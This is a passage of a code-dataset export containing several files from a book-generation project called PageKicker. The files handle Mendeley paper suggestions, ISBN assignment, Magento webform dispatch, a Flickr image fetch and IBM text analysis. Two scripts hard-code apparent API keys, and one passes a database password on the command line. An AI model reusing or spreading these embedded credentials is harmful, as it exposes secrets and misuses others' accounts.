response['folder_id']\n\ndocs = mendeley.folder_documents(folderid)\npprint(docs)\nprint(\"Retrieving documents from selected folder\")\npub_list = []\npprint(pub_list)\n\n# from wikiradar.py\n\n# Dictionary mapping uuid's to a dictionary with keys: authors, title, year, count\nrelated_doc_dict = dict()\n\ndetails = mendeley.document_details(docs['document_ids'][0])\n\nprint(\"Looking up suggestions for related docs.\")\nprint(\"\")\nfor pub_item in pub_list:\n pprint(pub_item)\n related_docs = mendeley.related(pub_item.uuid, items=10)\n for related_doc in related_docs['documents']:\n uuid = related_doc['uuid']\n rel_doc_info = related_doc_dict.get(uuid, None)\n if rel_doc_info:\n rel_doc_info['count'] += 1\n else:\n rel_doc_info = dict()\n rel_doc_info['authors'] = related_doc['authors']\n rel_doc_info['title'] = related_doc['title']\n rel_doc_info['year'] = related_doc['year']\n rel_doc_info['count'] = 1\n related_doc_dict[uuid] = rel_doc_info\n\nrelated_list = sorted(list(related_doc_dict.values()), key = lambda doc:doc['count'])\nrelated_list.reverse()\n\nprint(\"Related Papers\")\nprint(\"--------------\")\ncount = 0\nfor pub_item in pub_list:\n print(\"%d: %s - %d\" % ((count+1), pub_item.title, pub_item.year))\n count += 1\nprint(\"\")\n\nprint(\"Found %d related papers to suggest.\" % len(related_list))\n\nprint(\"Suggested Related Papers\")\nprint(\"------------------------\")\ncount = 0\nfor item in related_list:\n year = float(item['year'])\n score = float(item['count'])/len(pub_list)\n #if (count < 20):\n #get recent docs instead\n if (year > 2009):\n print(\"%d: %s - %d | Score: %f\" % ((count + 1), item['title'], item['year'], score))\n count += 1\n score = float(item['count'])/len(related_list)\n if (score >= 0.5) and (count < 10):\n 
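# only suggest docs with a co-occurrence score of at least 0.5, capped at ten suggestions\n 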
print(\"%d: %s - %d | Score: %f\" % ((count+1), item['title'], item['year'], score))\n count += 1\nprint(\"\")\n\n# then upload suggested drelated papersto for Review folder\n\n\n\n" }, { "alpha_fraction": 0.6952646374702454, "alphanum_fraction": 0.7030640840530396, "avg_line_length": 31.01785659790039, "blob_id": "66cee03562c51ebd119e511ff113f1df60beaeac", "content_id": "c33826ea6db2e7f62f042d8ce185f6d42f51ff97", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1795, "license_type": "permissive", "max_line_length": 119, "num_lines": 56, "path": "/scripts/includes/prepare_4_coresource.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nISBNowner=\"8\"\n\nif [ \"$ebookISBN\" = \"no\" ] ; then\n\n\techo \"ISBN not assigned automatically, looking for one that is manually entered\" | tee --append $sfb_log\n\n\nelse\n\techo \"user has asked for ISBN to be assigned automatically\" | tee --append $sfb_log\n\nfi\n\necho \"ISBNowner is \" $ISBNowner\n\ncase \"$ISBNowner\" in\n\n\n0)\n\techo \"no ISBN assigned\" | tee --append $sfb_log\n\n;;\n\n8) \n\n\tISBN=`head -1 ISBNs/customer_id_8/nimble-ISBNs-available.txt`\n\techo \"ISBN \"$ISBN\" was assigned to SKU \"$sku \"with covertitle \"$covertitle | tee --append $sfb_log $ISBN_log\n\techo -n $ISBN >> $sfb_log ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \",\" >> ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \"$title\" >> ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \",\">> ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \"$author\"| tee --append ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\tISBNs_remaining=`wc -l \"ISBNs/customer_id_8/nimble-ISBNs-available.txt\"`\n\techo \"there are \"$ISBNs_remaining\" in nimble-ISBNs-available.txt\" | tee --append $sfb_log\n\tsed -i '1,1d' ISBNs/customer_id_8/nimble-ISBNs-available.txt\n\n\t# fix up epub for submission to CoreSource\n\n\tcp $mediatargetpath$uuid/$sku\".epub\" $mediatargetpath$uuid\"/\"$ISBN\"_working.epub\"\n\t# epub-fix --epubcheck $mediatargetpath$uuid\"/\"$ISBN\"_working.epub\"\n\tcp $mediatargetpath$uuid\"/\"$ISBN\"_working.epub\" $SFB_MAGENTO_HOME\"media/lsi-import/\"$ISBN\"_EPUB.epub\"\n\n\t# echo \"created epubfixed version of\" $sku.\"epub\" at $mediatargetpath$uuid\"/\"$ISBN\"_EPUB.epub\" | tee --append $sfb_log\n\n\tconvert images/$uuid/$sku\".png\" $SFB_MAGENTO_HOME\"media/lsi-import/\"$ISBN\"_FC.jpg\"\n\n\techo \"converted cover png to jpg for CoreSource\" | tee --append $sfb_log\n\n;;\n\n*)\n\n\techo \"no ISBNs associated with this value of ISBN_owner\" $ISBN_owner | tee --append $sfb_log\n\t\n;;\n\nesac\n\n" }, { "alpha_fraction": 0.5630252361297607, "alphanum_fraction": 0.6134454011917114, "avg_line_length": 22.799999237060547, "blob_id": "88293809e367c40ea67938feaf836384569974bd", "content_id": "ae72c114e396d60895b90979b472572b5d6b9e8a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 119, "license_type": "permissive", "max_line_length": 58, "num_lines": 5, "path": "/test/decimator-test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# usage decimator.sh \"$1\" \"$2\"\necho $1\necho $2\nbin/decimator.sh --pdfinfile \"$1\" --outdir scr --tldr \"$2\"\n" }, { "alpha_fraction": 0.690666675567627, "alphanum_fraction": 0.6996490955352783, "avg_line_length": 36.29842758178711, "blob_id": "152a121aa7345ed084df7f35121f560f46192a67", 
"content_id": "34513fe0443d21be9900f786572c4e2397fcbbfd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7125, "license_type": "permissive", "max_line_length": 136, "num_lines": 191, "path": "/scripts/xform.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " #!/bin/bash\n\n# file path for file attachments must be hard coded\n# to match the magento file structure & specifically webform field #\n\n# requires inotify to alert that xml file has been created by the Magento webforms plugin and deposited in the correct directory\n# which is set by incrontab command for the bitnami user\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\nstarttime=$(( `date +%s` ))\ndatenow=$(date -R)\n\n# parse the command-line very stupidly\n\nxmldirectoryname=$1\nxmlbasefile=$2\necho \"parameter 1 is\" $1\necho \"parameter 2 is\" $2\nxmlfilename=$xmldirectoryname/$xmlbasefile\n\necho \"loaded\" $environment \"config file at \" $datenow\n\nuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\nmkdir -p -m 755 $logdir$uuid\nxform_log=$logdir$uuid/\"xform_log\"\necho \"XXXXXXXXXX\" | tee --append $xform_log\necho \"xmlfilename provided by webforms is\" $xmlfilename | tee --append $xform_log\necho \"xform_log is\" $xform_log | tee --append $xform_log\necho \"started xform at \" $starttime \" details in $xform_log\" | tee --append $xform_log\n\necho \"WEBFORMSXML_HOME is $WEBFORMSXML_HOME\"\n\n\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\necho \"sku\" $sku | tee --append $xform_log\n\necho \"$0 version in $environment\" \"is\" $SFB_VERSION | tee --append $xform_log\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\n# echo \"PATH is\" $PATH | tee --append $xform_log\n\n# use xmlstarlet to extract variable values that are common to all Magento forms\nsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\nwebform_id=$(xmlstarlet sel -t -v \"/item/webform_id\" \"$xmlfilename\")\ncustomerid=$(xmlstarlet sel -t -v \"/item/customer_id\" \"$xmlfilename\")\ncustomer_name=$(xmlstarlet sel -t -v \"/item/customer_name\" \"$xmlfilename\")\ncustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\n\n\n# echo them back so I can see that they are the correct variable values\n\necho \"webform_id was\" $webform_id | tee --append $xform_log\necho \"submissionid was\" $submissionid | tee --append $xform_log\necho \"customerid was \" $customerid | tee --append $xform_log\necho \"customername was\" $customer_name | tee --append $xform_log\necho \"customeremail was\" $customer_email | tee --append $xform_log $sfb_log\n\n# begin case loop that checks to see what form has been submitted and acts accordingly\n\ncase $webform_id in\n\n4)\n\n# echo \"found Magento form submission id 4, executing ccc\"\n\n$scriptpath\"bin/create-catalog-entry.sh\" --xmlfilename \"$xmlbasefile\" --passuuid \"$uuid\" --format \"xml\" --builder \"yes\" --summary \"both\"\n\necho \"launched $0 from\" 
$environment\n;;\n\n21)\n\necho \"running create your robot form 21\" | tee --append $xform_log\n$scriptpath\"bin/robot-builder.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n\n;;\n\n23)\n\n# echo \"running dat.sh with xml file from webform\"\n$scriptpath\"bin/dat.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n;;\n\n\n\n24)\n\n echo \"Automatically Build the Cover for Your Printed Book\" | tee --append $xform_log\n covercolor=$(xmlstarlet sel -t -v \"/item/covercolor\" \"$xmlfilename\")\n coverfontcolor=$(xmlstarlet sel -t -v \"/item/coverfontcolor\" \"$xmlfilename\")\n coverfont=$(xmlstarlet sel -t -v \"/item/coverfont\" \"$xmlfilename\")\n customtitle=$(xmlstarlet sel -t -v \"/item/customtitle\" \"$xmlfilename\")\n environment=$(xmlstarlet sel -t -v \"/item/environment\" \"$xmlfilename\")\n imagebase=$(xmlstarlet sel -t -v \"/item/imagebase\" \"$xmlfilename\")\n\timprintname=$(xmlstarlet sel -t -v \"item/imprintname\" \"$xmlfilename\")\n LANG=$(xmlstarlet sel -t -v \"/item/lang\" \"$xmlfilename\")\n\tpdffilename=$(xmlstarlet sel -t -v \"item/pdffilename\" \"$xmlfilename\")\n\tshorttitle=$(xmlstarlet sel -t -v \"/item/shorttitle\" \"$xmlfilename\")\n spineinches=$(xmlstarlet sel -t -v \"item/spineinches\" \"$xmlfilename\")\n trimsize=$(xmlstarlet sel -t -v \"item/trimsize\" \"$xmlfilename\")\n userdescription=$(xmlstarlet sel -t -v \"item/userdescription\" \"$xmlfilename\")\n userprovidedprintISBN=$(xmlstarlet sel -t -v \"/item/userprovidedprintISBN\" \"$xmlfilename\")\n yourlogo=$(xmlstarlet sel -t -v \"/item/yourlogo\" \"$xmlfilename\")\n editedby=$(xmlstarlet sel -t -v \"/item/editedby\" \"$xmlfilename\")\n\tpdfx1a=$(xmlstarlet sel -t -v \"/item/pdfx1a\" \"$xmlfilename\")\n\techo \"pdffilename is\" $pdffilename\n\tpdfbase=$WEBFORMSXML_HOME$submissionid\n\techo \"pdf base is\" $WEBFORMSXML_HOME$submissionid\n\tpdfsecuredir=`ls $pdfbase/*`\n\tpdffullpath=$pdfbase\"/356/\"$pdfsecuredir\"/\"\n\techo \"pdf full path is\" $pdffullpath\n\n\tpdfpath=$pdffullpath$pdffilename\n\n\tmkdir -p images/$uuid images/$uuid/print\n\tbackcovertext=$(xmlstarlet sel -t -v \"/item/backcovertext\" \"$xmlfilename\")\n\techo $backcovertext > images/$uuid/print/backcover.txt\n\n\techo \"cover font properties are \" $coverfont $covercolor $coverfontcolor\n\n\techo \"now running print cover builder with appropriate flags\" | tee --append $xform_log\n\n\techo \"breakpoint\" | tee --append $xform_log\n\n\tbin/standalone-print.sh \\\n\t--ISBN \"$userprovidedprintISBN\" \\\n\t--shorttitle \"$shorttitle\" \\\n\t--imprintname \"$imprintname\" \\\n\t--spineinches \"$spineinches\" \\\n\t--pdfpath \"$pdfpath\" \\\n\t--editedby \"$editedby\" \\\n\t--covertitle \"$customtitle\" \\\n\t--coverfontcolor \"$coverfontcolor\" \\\n\t--coverfont \"$coverfont\" \\\n\t--covercolor \"$covercolor\" \\\n\t--covertype \"wordcloud\" \\\n --trimsize \"$trimsize\" \\\n --customer_email \"$customer_email\" \\\n\t--pass_uuid \"$uuid\" \\\n\t--pdfx1a \"$pdfx1a\"\n ;;\n\n\n27)\n\n echo \"Feed the Robot\" | tee --append $xform_log\n mkdir -p -m 755 $TMPDIR$uuid\n filename=$(xmlstarlet sel -t -v \"/item/food_for_thought\" \"$xmlfilename\")\n key_380=$(xmlstarlet sel -t -v \"/item/key_380\" \"$xmlfilename\")\n echo \"filename is\" $filename | tee --append $xform_log\n cp $WEBFORMSXML_HOME$submissionid\"/380/$key_380/$filename\" $TMPDIR$uuid/$filename\n curl 'http://localhost:8983/solr/update/extract?literal.id=exid'$uuid\"&commit=true\" -F 
\"myfile=@tmp/\"$uuid\"/\"$filename\n echo \"committed file \"$filename \"to Solr\" | tee --append $xform_log\n;;\n34)\n\necho \"running create your imprint webform id 34\" | tee --append $xform_log\n$scriptpath\"bin/imprint-builder.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n\n;;\n35)\n\necho \"running Decimator id 35\" | tee --append $xform_log\n$scriptpath\"bin/dat.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n\n;;\n*)\n\techo \"invalid webform id was \" $webform_id | tee --append $xform_log\n\texit 1\n;;\n\nesac\necho \"exiting with LANG set to\" $LANG | tee --append $xform_log\necho \"ended logging xform activities\" | tee --append $xform_log $sfb_log\n" }, { "alpha_fraction": 0.6507812738418579, "alphanum_fraction": 0.698437511920929, "avg_line_length": 33.5945930480957, "blob_id": "d6e00c60f930f361a2b410dfafa4c52337bc663b", "content_id": "5bdeb8d8f04ab75ca237d2364469b3f7eefb89ee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1280, "license_type": "permissive", "max_line_length": 95, "num_lines": 37, "path": "/test/python_scripts_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# python script tests\nPYTHON_BIN=\"$1\"\nPYTHON27_BIN=\"$2\"\necho -n \"PYTHON_BIN version is \" \n$PYTHON_BIN --version\necho -n \"which PYTHON_BIN is \" \nwhich $PYTHON_BIN\necho -n \"PYTHON27_BIN version is \" \n$PYTHON27_BIN --version\necho -n \"which PYTHON27_BIN is \" \nwhich $PYTHON27_BIN\necho \"\"\necho \"running tests using \" $PYTHON_BIN\necho \"\"\n\n#working \"$PYTHON_BIN\" bin/wikifetcher.py --infile seeds/paella --outfile scr/test\n\"$PYTHON_BIN\" bin/wiki_seeds_2_pages.py --infile \"seeds/paella\" --pagehits \"scr/pagehits_py3\"\n\"$PYTHON_BIN\" bin/PKsum.py -l \"5\" -o scr/sumtest ../test/tmpbody.md #not working right now\n\"$PYTHON_BIN\" bin/csvreader.py \"../test/1001_1.csv\" \"1234\" 1\n\"$PYTHON_BIN\" bin/nerv3.py ../test/tmpbody.md scr/nervoutput 1234\n\nif [ \"$3\" = \"yes\" ] ; then\necho \"\"\necho \"running tests using \" $PYTHON27_BIN\necho \"\"\n\"$PYTHON27_BIN\" bin/wikifetcher.py --infile seeds/paella --outfile scr/test\n\"$PYTHON27_BIN\" bin/wiki_seeds_2_pages.py --infile \"seeds/paella\" --pagehits \"scr/pagehits_py2\"\n\"$PYTHON27_BIN\" bin/PKsum.py -l \"5\" -o scr/sumtest ../test/tmpbody.md \n# working \"$PYTHON27_BIN\" bin/nerv3.py ../test/tmpbody.md scr/nervoutput 123\n# working \"$PYTHON27_BIN\" bin/csvreader.py \"../test/1001_1.csv\" \"123\" 1\n\nelse \n\necho \"not running tests using \" $PYTHON27_BIN\n\nfi\n" }, { "alpha_fraction": 0.6544542908668518, "alphanum_fraction": 0.6841496229171753, "avg_line_length": 53.02083206176758, "blob_id": "797e31a65996e14ef464470effb833ae9b159953", "content_id": "78c322e1be219ff11ad97b61023b2dbecbd7f832", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2593, "license_type": "permissive", "max_line_length": 112, "num_lines": 48, "path": "/scripts_python_3/bin/nerv-watson.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "import json\nfrom os.path import join, dirname\nfrom watson_developer_cloud import AlchemyLanguageV1\n\nalchemy_language = AlchemyLanguageV1(api_key='b887e176b6a650093c3d4ca635cd1b470be6584e')\n\nurl = 
'https://www.axios.com/these-are-the-trumpworld-players-we-know-have-had-russian-contacts-2401422409.html'\n\n#print(json.dumps(\n# alchemy_language.targeted_sentiment(text='I love cats! Dogs are smelly.',\n# targets=['cats', 'dogs'],\n# language='english'), indent=2))\n# print(json.dumps(alchemy_language.targeted_emotion(text='I love apples. I\n# hate bananas',\n# targets=['apples',\n# 'bananas'], language='english'), indent=2))\n\n# print(json.dumps(alchemy_language.author(url=url), indent=2))\nprint((json.dumps(alchemy_language.concepts(max_items=7, url=url), indent=2)))\n# print(json.dumps(alchemy_language.dates(url=url, anchor_date='2016-03-22\n# 00:00:00'), indent=2))\n# print(json.dumps(alchemy_language.emotion(url=url), indent=2))\n# print(json.dumps(alchemy_language.entities(url=url), indent=2))\n# print(json.dumps(alchemy_language.keywords(max_items=5, url=url), indent=2))\n# print(json.dumps(alchemy_language.category(url=url), indent=2))\n# print(json.dumps(alchemy_language.typed_relations(url=url), indent=2))\n# print(json.dumps(alchemy_language.relations(url=url), indent=2))\n# print(json.dumps(alchemy_language.language(url=url), indent=2))\n# print(json.dumps(alchemy_language.text(url=url), indent=2))\n# print(json.dumps(alchemy_language.raw_text(url=url), indent=2))\n# print(json.dumps(alchemy_language.title(url=url), indent=2))\n# print(json.dumps(alchemy_language.feeds(url=url), indent=2))\n# print(json.dumps(alchemy_language.microformats(\n# url='http://microformats.org/wiki/hcard-examples'), indent=2))\n# print(json.dumps(alchemy_language.publication_date(url=url), indent=2))\n# print(json.dumps(alchemy_language.taxonomy(url=url), indent=2))\ncombined_operations = ['page-image', 'entity', 'keyword', 'title', 'author',\n 'taxonomy', 'concept', 'doc-emotion']\nprint((\n json.dumps(alchemy_language.combined(url=url, extract=combined_operations),\n indent=2)))\n\n# Get sentiment and emotion information results for detected entities/keywords:\n# print(json.dumps(alchemy_language.entities(url=url, sentiment=True,\n# emotion=True), indent=2))\n# print(json.dumps(alchemy_language.keywords(max_items=5, url=url,\n# sentiment=True, emotion=True),\n# indent=2))\n" }, { "alpha_fraction": 0.6858729720115662, "alphanum_fraction": 0.6948975920677185, "avg_line_length": 22.801652908325195, "blob_id": "52150a02605fa82f2b41fef6162060aca50cc60e", "content_id": "2c654aa48384197847a9f8c14ba759931baea4e3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2881, "license_type": "permissive", "max_line_length": 116, "num_lines": 121, "path": "/scripts/includes/PKinit.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho '------------------------------'\nTEXTDOMAIN=SFB\necho $\"hello, world\"\n\n. ../conf/config.txt\n\necho \"software id in $environment is \" $SFB_VERSION\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` | tee --append $sfb_log\n\necho \"SFB version is SFB\"$SFB_VERSION | tee --append $sfb_log\n\nstarttime=$(( `date +%s` ))\n\necho \"starttime for performance monitoring is ...\" $starttime | tee --append $sfb_log\n\n. includes/initialize-default-normal-values-of-flag-variables.sh\n\n. flags.sh \n\n# parse the command-line\nFLAGS \"$@\" || exit 1\neval set -- \"${FLAGS_argv}\"\n\n# command line options trump jobprofiles\n\n. 
includes/set-variables-via-flags.sh\n\n# jobprofiles trump command line\n\njobprofile=${FLAGS_jobprofile}\n\n. ../conf/jobprofiles/$jobprofile\n\necho \"read jobprofile\" $jobprofile | tee --append $sfb_log\n\n\nif [ \"$verbose\" = \"yes\" ] ; then\n\n\t. includes/echo-variables.sh\n\nelse\n\n\techo \"not echoing variable values, you must think you know what you're doing\"\n\nfi\n\n. includes/api-manager.sh\n\n\nif [ \"$pass_uuid\" = \"no\" ] ; then\n\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"new uuid for this instance is\" $uuid | tee --append $sfb_log\n\nelse\n\t\n\tuuid=$pass_uuid\n\techo \"received uuid from parent instance, uuid is\" $uuid | tee --append $sfb_log\n\nfi\n\n# add to jobs file\n\n#passwordflag=\"--password\"\n#passwordvalue=$LOCAL_MYSQL_PASSWORD\n#passwordtext=$passwordflag$passwordvalue\n#echo $passwordtext\n\n\n\n$LOCAL_MYSQL_PATH --user $LOCAL_MYSQL_USER --password=$LOCAL_MYSQL_PASSWORD sfb-jobs << EOF\ninsert into jobs (uuid, SFB_revision_no) values('$uuid', '$bazaar_revision');\nEOF\n\necho \"added job row to SFB database\" | tee --append $sfb_log\n\n\nmkdir -m 755 tmp/$uuid\nmkdir -m 755 fetch/$uuid\nmkdir -m 755 $metadatatargetpath$uuid\nmkdir -m 755 $mediatargetpath$uuid\nmkdir -m 755 seeds/uuids/$uuid\nmkdir -m 755 $logdir$uuid\nmkdir -m 755 images/$uuid\nmkdir -m 755 mail/$uuid\n\n#initial values of command line options\n\n#writing initial values of program paths to log\n\nif [ $verbose = \"yes\" ] ; then\n\n\techo 'default values are' | tee --append $sfb_log\n\techo \"metadatatargetpath is \" $metadatatargetpath | tee --append $sfb_log\n\techo \"mediatargetpath is\" $mediatargetpath | tee --append $sfb_log\n\techo \"media archive txt target path is \" $mediaarchivetxt | tee --append $sfb_log\n\techo \"deliverytargetpath is \" $deliverytargetpath | tee --append $sfb_log\n\techo \"scriptpath is \" $scriptpath | tee --append $sfb_log\n\techo \"imagedir\" is $imagedir | tee --append $sfb_log\n\techo \"cover_image_extension\" is $cover_image_extension | tee --append $sfb_log\n\techo \"ebook introductory boilerplate is \" $ebookintro | tee --append $sfb_log\n\nfi\t\n\nsfb_log=$logdir/$uuid/sfb_log.$uuid\".txt\"\n\n\nif [ \"$verbose\" = \"yes\" ] ; then\n\n\tcat ../conf/config.txt | tee --append $sfb_log\n\nfi\t\n\nif [ \"$verbose\" = \"yes\" ] ; then\n\n\t. 
includes/echo-variables.sh\n\nfi\n\n" }, { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.732467532157898, "avg_line_length": 35, "blob_id": "f988d38421ee2282b43a75239ee971874c673b01", "content_id": "db2e24e5de8b034edf949410549df1d304b71739", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 385, "license_type": "permissive", "max_line_length": 124, "num_lines": 11, "path": "/scripts/bin/create-uniq-seed-history-csv.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# assumes that this is located in scriptpath home\n\ncat $LOCAL_DATA\"seeds/history/seed-history.csv\" | cut -d, -f1 | sort | uniq -c > $LOCAL_DATA\"seeds/history/stats-seeds.csv\"\n\n# cats the history file,\n# sorts and counts occurrences of each seed,\n# and finally writes the result to an output file.\necho \"counted seeds in seed-history.csv and wrote to stats-seeds.csv\" >> logs/sfb_log.txt\nexit 0\n" }, { "alpha_fraction": 0.7601770162582397, "alphanum_fraction": 0.7601770162582397, "avg_line_length": 30.36111068725586, "blob_id": "ca635f97cec4e0fa4489d43240b3f4fe96b4266a", "content_id": "5771ffbc1aa23e929be406657fc1f7ce14a4b205", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1130, "license_type": "permissive", "max_line_length": 57, "num_lines": 36, "path": "/scripts/includes/override-default-and-jobprofile-values-with-flags-passed-from-command-line.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " rows=${FLAGS_rows}\n price=${FLAGS_price}\n categoryid=${FLAGS_categoryid}\n seedfile=${FLAGS_seedfile}\n userid=${FLAGS_userid}\n customtitle=${FLAGS_customtitle}\n endurl=${FLAGS_endurl}\n coverfile=${FLAGS_coverfile}\n fetchfile=${FLAGS_fetchfile}\n special_lasts_minutes=${FLAGS_special_lasts_minutes}\n special_price=${FLAGS_special_price}\n covercolor=${FLAGS_covercolor}\n coverfont=${FLAGS_coverfont}\n covertype_id=${FLAGS_covertype_id}\n coverbase=${FLAGS_coverbase}\n coverfontcolor=${FLAGS_coverfontcolor}\n coverRGB=${FLAGS_coverRGB}\n text_extraction_on=${FLAGS_text_extraction_on}\n refresh=${FLAGS_refresh}\n editedby=${FLAGS_editedby}\n seedsource=${FLAGS_seedsource}\n breaking=${FLAGS_breaking}\n editorid=${FLAGS_editorid}\n singleseed=${FLAGS_singleseed}\n import=${FLAGS_import}\n mylibrary=${FLAGS_mylibrary}\n fleet=${FLAGS_fleet}\n booktype=${FLAGS_booktype}\n ebookformat=${FLAGS_ebookformat}\n fetched_document_format=${FLAGS_fetched_document_format}\n verbose=${FLAGS_verbose}\n userdescription=${FLAGS_userdescription}\n pass_uuid=${FLAGS_pass_uuid}\n ISBN=${FLAGS_ISBN}\n ISBN_owner=${FLAGS_ISBN_owner}\n fdf=$fetched_document_format\n" }, { "alpha_fraction": 0.5784511566162109, "alphanum_fraction": 0.5885521769523621, "avg_line_length": 33.94117736816406, "blob_id": "40cf971f58fec0d8ed1ab806eac02835beb1b90f", "content_id": "f39e2c8cb41286cb59b9f17a516427997013090a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2970, "license_type": "permissive", "max_line_length": 101, "num_lines": 85, "path": "/scripts_python_3/bin/dev_Flickr_single.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#Inputs:\n#1) a single seed \n#2) a uuid \n#Outputs:\n#1) url_list.txt - a list of images that are retrieved from Flickr 
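(one image URL per line, each with its title and Flickr-user attribution)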
\n\nimport os, sys, json, flickrapi, codecs \n\n#=================================================\ndef callTheApi(api_key, seed, per_page_num):\n\t#This calls the API with a search term or 'seed'\n\tflickr = flickrapi.FlickrAPI(api_key)\n\tjson_photos = json.loads(flickr.photos_search(text=seed, \\\n\tper_page=str(per_page_num), format = 'json', nojsoncallback=1, \\\n\tlicense = '4,6' ));\n\t#print json_photos\n\treturn json_photos\n\n#=================================================\ndef getFlickrUsername(api_key, pic_owner):\n\t#calls API to retrieve username for photo\n\tflickr = flickrapi.FlickrAPI(api_key)\n\tuser_info = json.loads(flickr.people_getInfo(user_id = pic_owner, \\\n\tformat = 'json', nojsoncallback = 1))\n\t\n\t#Filters out those users who don't have their real name available\n\t#and uses their username instead\n\tif 'realname' in user_info['person']:\n\t\tusername = user_info['person']['realname']['_content']\n\t\tif username == '':\n\t\t\tusername = user_info['person']['path_alias']\n\telse:\n\t\tusername = user_info['person']['path_alias']\n\treturn username\n\n\n\n\n#=================================================\ndef parser(json_photos, per_page_num, api_key, seed, savepath):\n\t#here we can do a quick dirty parsing now\n\t#ideally, we go back and make a class that will hold all the data\n\t\n\t#filters out null results \n\tif json_photos['photos']['total'] != '0':\n\t\t\n\t\tf = codecs.open(savepath+'/url_list.txt', encoding = \n'utf-8', mode = 'w+')\n\t\tfor pic in range(per_page_num):\n\t\t\n\t\t\tpic_title = json_photos[\"photos\"]['photo'][int(pic)]['title']\n\t\t\tpic_owner = json_photos['photos']['photo'][int(pic)]['owner']\n\t\t\tpic_id = json_photos['photos']['photo'][int(pic)]['id']\n\t\t\tpic_farm = json_photos['photos']['photo'][int(pic)]['farm']\n\t\t\tpic_server = json_photos['photos']['photo'][int(pic)]['server']\n\t\t\tpic_secret = json_photos['photos']['photo'][int(pic)]['secret']\n\t\n\t\t\tusername = getFlickrUsername(api_key, pic_owner)\n\t\n\t\t\turl = \"http://farm\" + str(pic_farm) + \".static.flickr.com/\"\\\n\t\t\t+ pic_server + \"/\" + pic_id + \"_\" + pic_secret + \".jpg\"\n\t\t\tf.write(seed + ': \"' + pic_title + '\", An image by Flickr user: ' + username + ' : ' + url + '\\n')\n\t\n\t\tf.close()\n\t\n#=================================================\ndef main():\n\t#working_path = '/opt/bitnami/apache2/htdocs/pk-main/development/\\\n\t#scripts/tmp'\n\tseed = str(sys.argv[1])\n\tuuid = str(sys.argv[2])\n\tuuid_path = '/opt/bitnami/apache2/htdocs/pk-main/development/scripts/'\\\n\t+'tmp'\n\tsavepath = uuid_path + '/' + uuid + '/fetched'\n\tos.chdir(uuid_path + '/' + uuid)\n\tapi_key = 'e7a1dbf3d545efe6dfe297f3745c1dbd'\n\tper_page_num = 10\n\tjson_photos = callTheApi(api_key, seed, per_page_num);\n\tparser(json_photos, per_page_num, api_key, seed, savepath)\n \n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8131313323974609, "alphanum_fraction": 0.8131313323974609, "avg_line_length": 197, "blob_id": "0073f2f40c47d5c18c25a8f9ec646fcb07a79424", "content_id": "9593f4f8ef1f3b7f3245d84da7c4785815044a21", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 198, "license_type": "permissive", "max_line_length": 197, "num_lines": 1, "path": 